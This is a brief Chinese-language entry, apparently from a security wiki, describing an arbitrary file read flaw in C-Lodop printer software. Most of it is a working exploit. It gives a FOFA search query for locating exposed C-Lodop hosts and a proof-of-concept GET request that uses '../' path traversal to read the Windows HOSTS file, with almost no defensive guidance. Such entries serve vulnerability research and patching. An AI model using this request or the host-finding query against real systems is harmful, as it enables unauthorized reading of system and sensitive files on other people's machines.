C-Lodop打印机任意文件读取漏洞

C-Lodop打印机存在任意文件读取漏洞,通过构造特殊URL,可实现读取系统任意文件。

fofa:title="C-Lodop"

poc:

GET /../../../../../../../../windows/System32/drivers/etc/HOSTS HTTP/1.1
Host: 127.0.0.1
....
Edge Security文库 all right reserved,powered by GitbookFile Modify: 2021-05-22 00:14:38

results matching ""

    No results matching ""